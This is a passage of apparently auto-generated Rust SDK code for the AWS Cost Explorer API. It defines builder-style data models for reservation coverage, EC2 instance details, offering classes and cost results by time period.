/// <p>Determines whether the recommendation is for a current-generation instance. </p>
pub fn current_generation(mut self, input: bool) -> Self {
self.current_generation = Some(input);
self
}
pub fn set_current_generation(mut self, input: std::option::Option<bool>) -> Self {
self.current_generation = input;
self
}
/// <p>Determines whether the recommended reservation is size flexible.</p>
pub fn size_flex_eligible(mut self, input: bool) -> Self {
self.size_flex_eligible = Some(input);
self
}
pub fn set_size_flex_eligible(mut self, input: std::option::Option<bool>) -> Self {
self.size_flex_eligible = input;
self
}
/// Consumes the builder and constructs a [`Ec2InstanceDetails`](crate::model::Ec2InstanceDetails)
pub fn build(self) -> crate::model::Ec2InstanceDetails {
crate::model::Ec2InstanceDetails {
family: self.family,
instance_type: self.instance_type,
region: self.region,
availability_zone: self.availability_zone,
platform: self.platform,
tenancy: self.tenancy,
current_generation: self.current_generation.unwrap_or_default(),
size_flex_eligible: self.size_flex_eligible.unwrap_or_default(),
}
}
}
}
impl Ec2InstanceDetails {
/// Creates a new builder-style object to manufacture [`Ec2InstanceDetails`](crate::model::Ec2InstanceDetails)
pub fn builder() -> crate::model::ec2_instance_details::Builder {
crate::model::ec2_instance_details::Builder::default()
}
}
/// <p>Hardware specifications for the service that you want recommendations for.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ServiceSpecification {
/// <p>The Amazon EC2 hardware specifications that you want Amazon Web Services to provide
/// recommendations for.</p>
pub ec2_specification: std::option::Option<crate::model::Ec2Specification>,
}
impl std::fmt::Debug for ServiceSpecification {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ServiceSpecification");
formatter.field("ec2_specification", &self.ec2_specification);
formatter.finish()
}
}
/// See [`ServiceSpecification`](crate::model::ServiceSpecification)
pub mod service_specification {
/// A builder for [`ServiceSpecification`](crate::model::ServiceSpecification)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) ec2_specification: std::option::Option<crate::model::Ec2Specification>,
}
impl Builder {
/// <p>The Amazon EC2 hardware specifications that you want Amazon Web Services to provide
/// recommendations for.</p>
pub fn ec2_specification(mut self, input: crate::model::Ec2Specification) -> Self {
self.ec2_specification = Some(input);
self
}
pub fn set_ec2_specification(
mut self,
input: std::option::Option<crate::model::Ec2Specification>,
) -> Self {
self.ec2_specification = input;
self
}
/// Consumes the builder and constructs a [`ServiceSpecification`](crate::model::ServiceSpecification)
pub fn build(self) -> crate::model::ServiceSpecification {
crate::model::ServiceSpecification {
ec2_specification: self.ec2_specification,
}
}
}
}
impl ServiceSpecification {
/// Creates a new builder-style object to manufacture [`ServiceSpecification`](crate::model::ServiceSpecification)
pub fn builder() -> crate::model::service_specification::Builder {
crate::model::service_specification::Builder::default()
}
}
/// <p>The Amazon EC2 hardware specifications that you want Amazon Web Services to provide
/// recommendations for.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Ec2Specification {
/// <p>Indicates whether you want a recommendation for standard or convertible
/// reservations.</p>
pub offering_class: std::option::Option<crate::model::OfferingClass>,
}
impl std::fmt::Debug for Ec2Specification {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("Ec2Specification");
formatter.field("offering_class", &self.offering_class);
formatter.finish()
}
}
/// See [`Ec2Specification`](crate::model::Ec2Specification)
pub mod ec2_specification {
/// A builder for [`Ec2Specification`](crate::model::Ec2Specification)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) offering_class: std::option::Option<crate::model::OfferingClass>,
}
impl Builder {
/// <p>Indicates whether you want a recommendation for standard or convertible
/// reservations.</p>
pub fn offering_class(mut self, input: crate::model::OfferingClass) -> Self {
self.offering_class = Some(input);
self
}
pub fn set_offering_class(
mut self,
input: std::option::Option<crate::model::OfferingClass>,
) -> Self {
self.offering_class = input;
self
}
/// Consumes the builder and constructs a [`Ec2Specification`](crate::model::Ec2Specification)
pub fn build(self) -> crate::model::Ec2Specification {
crate::model::Ec2Specification {
offering_class: self.offering_class,
}
}
}
}
impl Ec2Specification {
/// Creates a new builder-style object to manufacture [`Ec2Specification`](crate::model::Ec2Specification)
pub fn builder() -> crate::model::ec2_specification::Builder {
crate::model::ec2_specification::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum OfferingClass {
Convertible,
Standard,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for OfferingClass {
fn from(s: &str) -> Self {
match s {
"CONVERTIBLE" => OfferingClass::Convertible,
"STANDARD" => OfferingClass::Standard,
other => OfferingClass::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for OfferingClass {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(OfferingClass::from(s))
}
}
impl OfferingClass {
pub fn as_str(&self) -> &str {
match self {
OfferingClass::Convertible => "CONVERTIBLE",
OfferingClass::Standard => "STANDARD",
OfferingClass::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["CONVERTIBLE", "STANDARD"]
}
}
impl AsRef<str> for OfferingClass {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>Information about this specific recommendation, such as the timestamp for when Amazon Web Services made a specific recommendation.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationPurchaseRecommendationMetadata {
/// <p>The ID for this specific recommendation.</p>
pub recommendation_id: std::option::Option<std::string::String>,
/// <p>The timestamp for when Amazon Web Services made this recommendation.</p>
pub generation_timestamp: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ReservationPurchaseRecommendationMetadata {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ReservationPurchaseRecommendationMetadata");
formatter.field("recommendation_id", &self.recommendation_id);
formatter.field("generation_timestamp", &self.generation_timestamp);
formatter.finish()
}
}
/// See [`ReservationPurchaseRecommendationMetadata`](crate::model::ReservationPurchaseRecommendationMetadata)
pub mod reservation_purchase_recommendation_metadata {
/// A builder for [`ReservationPurchaseRecommendationMetadata`](crate::model::ReservationPurchaseRecommendationMetadata)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) recommendation_id: std::option::Option<std::string::String>,
pub(crate) generation_timestamp: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The ID for this specific recommendation.</p>
pub fn recommendation_id(mut self, input: impl Into<std::string::String>) -> Self {
self.recommendation_id = Some(input.into());
self
}
pub fn set_recommendation_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.recommendation_id = input;
self
}
/// <p>The timestamp for when Amazon Web Services made this recommendation.</p>
pub fn generation_timestamp(mut self, input: impl Into<std::string::String>) -> Self {
self.generation_timestamp = Some(input.into());
self
}
pub fn set_generation_timestamp(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.generation_timestamp = input;
self
}
/// Consumes the builder and constructs a [`ReservationPurchaseRecommendationMetadata`](crate::model::ReservationPurchaseRecommendationMetadata)
pub fn build(self) -> crate::model::ReservationPurchaseRecommendationMetadata {
crate::model::ReservationPurchaseRecommendationMetadata {
recommendation_id: self.recommendation_id,
generation_timestamp: self.generation_timestamp,
}
}
}
}
impl ReservationPurchaseRecommendationMetadata {
/// Creates a new builder-style object to manufacture [`ReservationPurchaseRecommendationMetadata`](crate::model::ReservationPurchaseRecommendationMetadata)
pub fn builder() -> crate::model::reservation_purchase_recommendation_metadata::Builder {
crate::model::reservation_purchase_recommendation_metadata::Builder::default()
}
}
/// <p>The amount of instance usage that a reservation covered.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Coverage {
/// <p>The amount of instance usage that the reservation covered, in hours.</p>
pub coverage_hours: std::option::Option<crate::model::CoverageHours>,
/// <p>The amount of instance usage that the reservation covered, in normalized units.</p>
pub coverage_normalized_units: std::option::Option<crate::model::CoverageNormalizedUnits>,
/// <p>The amount of cost that the reservation covered.</p>
pub coverage_cost: std::option::Option<crate::model::CoverageCost>,
}
impl std::fmt::Debug for Coverage {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("Coverage");
formatter.field("coverage_hours", &self.coverage_hours);
formatter.field("coverage_normalized_units", &self.coverage_normalized_units);
formatter.field("coverage_cost", &self.coverage_cost);
formatter.finish()
}
}
/// See [`Coverage`](crate::model::Coverage)
pub mod coverage {
/// A builder for [`Coverage`](crate::model::Coverage)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) coverage_hours: std::option::Option<crate::model::CoverageHours>,
pub(crate) coverage_normalized_units:
std::option::Option<crate::model::CoverageNormalizedUnits>,
pub(crate) coverage_cost: std::option::Option<crate::model::CoverageCost>,
}
impl Builder {
/// <p>The amount of instance usage that the reservation covered, in hours.</p>
pub fn coverage_hours(mut self, input: crate::model::CoverageHours) -> Self {
self.coverage_hours = Some(input);
self
}
pub fn set_coverage_hours(
mut self,
input: std::option::Option<crate::model::CoverageHours>,
) -> Self {
self.coverage_hours = input;
self
}
/// <p>The amount of instance usage that the reservation covered, in normalized units.</p>
pub fn coverage_normalized_units(
mut self,
input: crate::model::CoverageNormalizedUnits,
) -> Self {
self.coverage_normalized_units = Some(input);
self
}
pub fn set_coverage_normalized_units(
mut self,
input: std::option::Option<crate::model::CoverageNormalizedUnits>,
) -> Self {
self.coverage_normalized_units = input;
self
}
/// <p>The amount of cost that the reservation covered.</p>
pub fn coverage_cost(mut self, input: crate::model::CoverageCost) -> Self {
self.coverage_cost = Some(input);
self
}
pub fn set_coverage_cost(
mut self,
input: std::option::Option<crate::model::CoverageCost>,
) -> Self {
self.coverage_cost = input;
self
}
/// Consumes the builder and constructs a [`Coverage`](crate::model::Coverage)
pub fn build(self) -> crate::model::Coverage {
crate::model::Coverage {
coverage_hours: self.coverage_hours,
coverage_normalized_units: self.coverage_normalized_units,
coverage_cost: self.coverage_cost,
}
}
}
}
impl Coverage {
/// Creates a new builder-style object to manufacture [`Coverage`](crate::model::Coverage)
pub fn builder() -> crate::model::coverage::Builder {
crate::model::coverage::Builder::default()
}
}
/// <p>How much it costs to run an instance.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CoverageCost {
/// <p>How much an On-Demand Instance costs.</p>
pub on_demand_cost: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CoverageCost {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CoverageCost");
formatter.field("on_demand_cost", &self.on_demand_cost);
formatter.finish()
}
}
/// See [`CoverageCost`](crate::model::CoverageCost)
pub mod coverage_cost {
/// A builder for [`CoverageCost`](crate::model::CoverageCost)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) on_demand_cost: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>How much an On-Demand Instance costs.</p>
pub fn on_demand_cost(mut self, input: impl Into<std::string::String>) -> Self {
self.on_demand_cost = Some(input.into());
self
}
pub fn set_on_demand_cost(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.on_demand_cost = input;
self
}
/// Consumes the builder and constructs a [`CoverageCost`](crate::model::CoverageCost)
pub fn build(self) -> crate::model::CoverageCost {
crate::model::CoverageCost {
on_demand_cost: self.on_demand_cost,
}
}
}
}
impl CoverageCost {
/// Creates a new builder-style object to manufacture [`CoverageCost`](crate::model::CoverageCost)
pub fn builder() -> crate::model::coverage_cost::Builder {
crate::model::coverage_cost::Builder::default()
}
}
/// <p>The amount of instance usage, in normalized units. You can use normalized units to see
/// your EC2 usage for multiple sizes of instances in a uniform way. For example, suppose
/// that you run an xlarge instance and a 2xlarge instance. If you run both instances for
/// the same amount of time, the 2xlarge instance uses twice as much of your reservation as
/// the xlarge instance, even though both instances show only one instance-hour. When you
/// use normalized units instead of instance-hours, the xlarge instance used 8 normalized
/// units, and the 2xlarge instance used 16 normalized units.</p>
/// <p>For more information, see <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ri-modifying.html">Modifying Reserved Instances</a>
/// in the <i>Amazon Elastic Compute Cloud User Guide for Linux
/// Instances</i>.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CoverageNormalizedUnits {
/// <p>The number of normalized units that are covered by On-Demand Instances instead of a
/// reservation.</p>
pub on_demand_normalized_units: std::option::Option<std::string::String>,
/// <p>The number of normalized units that a reservation covers.</p>
pub reserved_normalized_units: std::option::Option<std::string::String>,
/// <p>The total number of normalized units that you used.</p>
pub total_running_normalized_units: std::option::Option<std::string::String>,
/// <p>The percentage of your used instance normalized units that a reservation
/// covers.</p>
pub coverage_normalized_units_percentage: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CoverageNormalizedUnits {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CoverageNormalizedUnits");
formatter.field(
"on_demand_normalized_units",
&self.on_demand_normalized_units,
);
formatter.field("reserved_normalized_units", &self.reserved_normalized_units);
formatter.field(
"total_running_normalized_units",
&self.total_running_normalized_units,
);
formatter.field(
"coverage_normalized_units_percentage",
&self.coverage_normalized_units_percentage,
);
formatter.finish()
}
}
/// See [`CoverageNormalizedUnits`](crate::model::CoverageNormalizedUnits)
pub mod coverage_normalized_units {
/// A builder for [`CoverageNormalizedUnits`](crate::model::CoverageNormalizedUnits)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) on_demand_normalized_units: std::option::Option<std::string::String>,
pub(crate) reserved_normalized_units: std::option::Option<std::string::String>,
pub(crate) total_running_normalized_units: std::option::Option<std::string::String>,
pub(crate) coverage_normalized_units_percentage: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The number of normalized units that are covered by On-Demand Instances instead of a
/// reservation.</p>
pub fn on_demand_normalized_units(mut self, input: impl Into<std::string::String>) -> Self {
self.on_demand_normalized_units = Some(input.into());
self
}
pub fn set_on_demand_normalized_units(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.on_demand_normalized_units = input;
self
}
/// <p>The number of normalized units that a reservation covers.</p>
pub fn reserved_normalized_units(mut self, input: impl Into<std::string::String>) -> Self {
self.reserved_normalized_units = Some(input.into());
self
}
pub fn set_reserved_normalized_units(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.reserved_normalized_units = input;
self
}
/// <p>The total number of normalized units that you used.</p>
pub fn total_running_normalized_units(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.total_running_normalized_units = Some(input.into());
self
}
pub fn set_total_running_normalized_units(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_running_normalized_units = input;
self
}
/// <p>The percentage of your used instance normalized units that a reservation
/// covers.</p>
pub fn coverage_normalized_units_percentage(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.coverage_normalized_units_percentage = Some(input.into());
self
}
pub fn set_coverage_normalized_units_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.coverage_normalized_units_percentage = input;
self
}
/// Consumes the builder and constructs a [`CoverageNormalizedUnits`](crate::model::CoverageNormalizedUnits)
pub fn build(self) -> crate::model::CoverageNormalizedUnits {
crate::model::CoverageNormalizedUnits {
on_demand_normalized_units: self.on_demand_normalized_units,
reserved_normalized_units: self.reserved_normalized_units,
total_running_normalized_units: self.total_running_normalized_units,
coverage_normalized_units_percentage: self.coverage_normalized_units_percentage,
}
}
}
}
impl CoverageNormalizedUnits {
/// Creates a new builder-style object to manufacture [`CoverageNormalizedUnits`](crate::model::CoverageNormalizedUnits)
pub fn builder() -> crate::model::coverage_normalized_units::Builder {
crate::model::coverage_normalized_units::Builder::default()
}
}
/// <p>How long a running instance either used a reservation or was On-Demand.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CoverageHours {
/// <p>The number of instance running hours that On-Demand Instances covered.</p>
pub on_demand_hours: std::option::Option<std::string::String>,
/// <p>The number of instance running hours that reservations covered.</p>
pub reserved_hours: std::option::Option<std::string::String>,
/// <p>The total instance usage, in hours.</p>
pub total_running_hours: std::option::Option<std::string::String>,
/// <p>The percentage of instance hours that a reservation covered.</p>
pub coverage_hours_percentage: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CoverageHours {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CoverageHours");
formatter.field("on_demand_hours", &self.on_demand_hours);
formatter.field("reserved_hours", &self.reserved_hours);
formatter.field("total_running_hours", &self.total_running_hours);
formatter.field("coverage_hours_percentage", &self.coverage_hours_percentage);
formatter.finish()
}
}
/// See [`CoverageHours`](crate::model::CoverageHours)
pub mod coverage_hours {
/// A builder for [`CoverageHours`](crate::model::CoverageHours)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) on_demand_hours: std::option::Option<std::string::String>,
pub(crate) reserved_hours: std::option::Option<std::string::String>,
pub(crate) total_running_hours: std::option::Option<std::string::String>,
pub(crate) coverage_hours_percentage: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The number of instance running hours that On-Demand Instances covered.</p>
pub fn on_demand_hours(mut self, input: impl Into<std::string::String>) -> Self {
self.on_demand_hours = Some(input.into());
self
}
pub fn set_on_demand_hours(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.on_demand_hours = input;
self
}
/// <p>The number of instance running hours that reservations covered.</p>
pub fn reserved_hours(mut self, input: impl Into<std::string::String>) -> Self {
self.reserved_hours = Some(input.into());
self
}
pub fn set_reserved_hours(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.reserved_hours = input;
self
}
/// <p>The total instance usage, in hours.</p>
pub fn total_running_hours(mut self, input: impl Into<std::string::String>) -> Self {
self.total_running_hours = Some(input.into());
self
}
pub fn set_total_running_hours(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_running_hours = input;
self
}
/// <p>The percentage of instance hours that a reservation covered.</p>
pub fn coverage_hours_percentage(mut self, input: impl Into<std::string::String>) -> Self {
self.coverage_hours_percentage = Some(input.into());
self
}
pub fn set_coverage_hours_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.coverage_hours_percentage = input;
self
}
/// Consumes the builder and constructs a [`CoverageHours`](crate::model::CoverageHours)
pub fn build(self) -> crate::model::CoverageHours {
crate::model::CoverageHours {
on_demand_hours: self.on_demand_hours,
reserved_hours: self.reserved_hours,
total_running_hours: self.total_running_hours,
coverage_hours_percentage: self.coverage_hours_percentage,
}
}
}
}
impl CoverageHours {
/// Creates a new builder-style object to manufacture [`CoverageHours`](crate::model::CoverageHours)
pub fn builder() -> crate::model::coverage_hours::Builder {
crate::model::coverage_hours::Builder::default()
}
}
/// <p>Reservation coverage for a specified period, in hours.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CoverageByTime {
/// <p>The period that this coverage was used over.</p>
pub time_period: std::option::Option<crate::model::DateInterval>,
/// <p>The groups of instances that the reservation covered.</p>
pub groups: std::option::Option<std::vec::Vec<crate::model::ReservationCoverageGroup>>,
/// <p>The total reservation coverage, in hours.</p>
pub total: std::option::Option<crate::model::Coverage>,
}
impl std::fmt::Debug for CoverageByTime {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CoverageByTime");
formatter.field("time_period", &self.time_period);
formatter.field("groups", &self.groups);
formatter.field("total", &self.total);
formatter.finish()
}
}
/// See [`CoverageByTime`](crate::model::CoverageByTime)
pub mod coverage_by_time {
/// A builder for [`CoverageByTime`](crate::model::CoverageByTime)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
pub(crate) groups:
std::option::Option<std::vec::Vec<crate::model::ReservationCoverageGroup>>,
pub(crate) total: std::option::Option<crate::model::Coverage>,
}
impl Builder {
/// <p>The period that this coverage was used over.</p>
pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
self.time_period = Some(input);
self
}
pub fn set_time_period(
mut self,
input: std::option::Option<crate::model::DateInterval>,
) -> Self {
self.time_period = input;
self
}
pub fn groups(mut self, input: impl Into<crate::model::ReservationCoverageGroup>) -> Self {
let mut v = self.groups.unwrap_or_default();
v.push(input.into());
self.groups = Some(v);
self
}
pub fn set_groups(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::ReservationCoverageGroup>>,
) -> Self {
self.groups = input;
self
}
/// <p>The total reservation coverage, in hours.</p>
pub fn total(mut self, input: crate::model::Coverage) -> Self {
self.total = Some(input);
self
}
pub fn set_total(mut self, input: std::option::Option<crate::model::Coverage>) -> Self {
self.total = input;
self
}
/// Consumes the builder and constructs a [`CoverageByTime`](crate::model::CoverageByTime)
pub fn build(self) -> crate::model::CoverageByTime {
crate::model::CoverageByTime {
time_period: self.time_period,
groups: self.groups,
total: self.total,
}
}
}
}
impl CoverageByTime {
/// Creates a new builder-style object to manufacture [`CoverageByTime`](crate::model::CoverageByTime)
pub fn builder() -> crate::model::coverage_by_time::Builder {
crate::model::coverage_by_time::Builder::default()
}
}
/// <p>A group of reservations that share a set of attributes.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationCoverageGroup {
/// <p>The attributes for this group of reservations.</p>
pub attributes:
std::option::Option<std::collections::HashMap<std::string::String, std::string::String>>,
/// <p>How much instance usage this group of reservations covered.</p>
pub coverage: std::option::Option<crate::model::Coverage>,
}
impl std::fmt::Debug for ReservationCoverageGroup {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ReservationCoverageGroup");
formatter.field("attributes", &self.attributes);
formatter.field("coverage", &self.coverage);
formatter.finish()
}
}
/// See [`ReservationCoverageGroup`](crate::model::ReservationCoverageGroup)
pub mod reservation_coverage_group {
/// A builder for [`ReservationCoverageGroup`](crate::model::ReservationCoverageGroup)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) attributes: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
pub(crate) coverage: std::option::Option<crate::model::Coverage>,
}
impl Builder {
pub fn attributes(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
let mut hash_map = self.attributes.unwrap_or_default();
hash_map.insert(k.into(), v.into());
self.attributes = Some(hash_map);
self
}
pub fn set_attributes(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.attributes = input;
self
}
/// <p>How much instance usage this group of reservations covered.</p>
pub fn coverage(mut self, input: crate::model::Coverage) -> Self {
self.coverage = Some(input);
self
}
pub fn set_coverage(mut self, input: std::option::Option<crate::model::Coverage>) -> Self {
self.coverage = input;
self
}
/// Consumes the builder and constructs a [`ReservationCoverageGroup`](crate::model::ReservationCoverageGroup)
pub fn build(self) -> crate::model::ReservationCoverageGroup {
crate::model::ReservationCoverageGroup {
attributes: self.attributes,
coverage: self.coverage,
}
}
}
}
impl ReservationCoverageGroup {
/// Creates a new builder-style object to manufacture [`ReservationCoverageGroup`](crate::model::ReservationCoverageGroup)
pub fn builder() -> crate::model::reservation_coverage_group::Builder {
crate::model::reservation_coverage_group::Builder::default()
}
}
/// <p>The metadata of a specific type that you can use to filter and group your results. You
/// can use <code>GetDimensionValues</code> to find specific values.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DimensionValuesWithAttributes {
/// <p>The value of a dimension with a specific attribute.</p>
pub value: std::option::Option<std::string::String>,
/// <p>The attribute that applies to a specific <code>Dimension</code>.</p>
pub attributes:
std::option::Option<std::collections::HashMap<std::string::String, std::string::String>>,
}
impl std::fmt::Debug for DimensionValuesWithAttributes {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DimensionValuesWithAttributes");
formatter.field("value", &self.value);
formatter.field("attributes", &self.attributes);
formatter.finish()
}
}
/// See [`DimensionValuesWithAttributes`](crate::model::DimensionValuesWithAttributes)
pub mod dimension_values_with_attributes {
/// A builder for [`DimensionValuesWithAttributes`](crate::model::DimensionValuesWithAttributes)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) value: std::option::Option<std::string::String>,
pub(crate) attributes: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
}
impl Builder {
/// <p>The value of a dimension with a specific attribute.</p>
pub fn value(mut self, input: impl Into<std::string::String>) -> Self {
self.value = Some(input.into());
self
}
pub fn set_value(mut self, input: std::option::Option<std::string::String>) -> Self {
self.value = input;
self
}
pub fn attributes(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
let mut hash_map = self.attributes.unwrap_or_default();
hash_map.insert(k.into(), v.into());
self.attributes = Some(hash_map);
self
}
pub fn set_attributes(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.attributes = input;
self
}
/// Consumes the builder and constructs a [`DimensionValuesWithAttributes`](crate::model::DimensionValuesWithAttributes)
pub fn build(self) -> crate::model::DimensionValuesWithAttributes {
crate::model::DimensionValuesWithAttributes {
value: self.value,
attributes: self.attributes,
}
}
}
}
impl DimensionValuesWithAttributes {
/// Creates a new builder-style object to manufacture [`DimensionValuesWithAttributes`](crate::model::DimensionValuesWithAttributes)
pub fn builder() -> crate::model::dimension_values_with_attributes::Builder {
crate::model::dimension_values_with_attributes::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum Context {
CostAndUsage,
Reservations,
SavingsPlans,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for Context {
fn from(s: &str) -> Self {
match s {
"COST_AND_USAGE" => Context::CostAndUsage,
"RESERVATIONS" => Context::Reservations,
"SAVINGS_PLANS" => Context::SavingsPlans,
other => Context::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for Context {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(Context::from(s))
}
}
impl Context {
pub fn as_str(&self) -> &str {
match self {
Context::CostAndUsage => "COST_AND_USAGE",
Context::Reservations => "RESERVATIONS",
Context::SavingsPlans => "SAVINGS_PLANS",
Context::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["COST_AND_USAGE", "RESERVATIONS", "SAVINGS_PLANS"]
}
}
impl AsRef<str> for Context {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>The result that's associated with a time period.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ResultByTime {
/// <p>The time period that the result covers.</p>
pub time_period: std::option::Option<crate::model::DateInterval>,
/// <p>The total amount of cost or usage accrued during the time period.</p>
pub total: std::option::Option<
std::collections::HashMap<std::string::String, crate::model::MetricValue>,
>,
/// <p>The groups that this time period includes.</p>
pub groups: std::option::Option<std::vec::Vec<crate::model::Group>>,
/// <p>Determines whether the result is estimated.</p>
pub estimated: bool,
}
impl std::fmt::Debug for ResultByTime {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ResultByTime");
formatter.field("time_period", &self.time_period);
formatter.field("total", &self.total);
formatter.field("groups", &self.groups);
formatter.field("estimated", &self.estimated);
formatter.finish()
}
}
/// See [`ResultByTime`](crate::model::ResultByTime)
pub mod result_by_time {
/// A builder for [`ResultByTime`](crate::model::ResultByTime)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
pub(crate) total: std::option::Option<
std::collections::HashMap<std::string::String, crate::model::MetricValue>,
>,
pub(crate) groups: std::option::Option<std::vec::Vec<crate::model::Group>>,
pub(crate) estimated: std::option::Option<bool>,
}
impl Builder {
/// <p>The time period that the result covers.</p>
pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
self.time_period = Some(input);
self
}
pub fn set_time_period(
mut self,
input: std::option::Option<crate::model::DateInterval>,
) -> Self {
self.time_period = input;
self
}
pub fn total(
mut self,
k: impl Into<std::string::String>,
v: impl Into<crate::model::MetricValue>,
) -> Self {
let mut hash_map = self.total.unwrap_or_default();
hash_map.insert(k.into(), v.into());
self.total = Some(hash_map);
self
}
pub fn set_total(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, crate::model::MetricValue>,
>,
) -> Self {
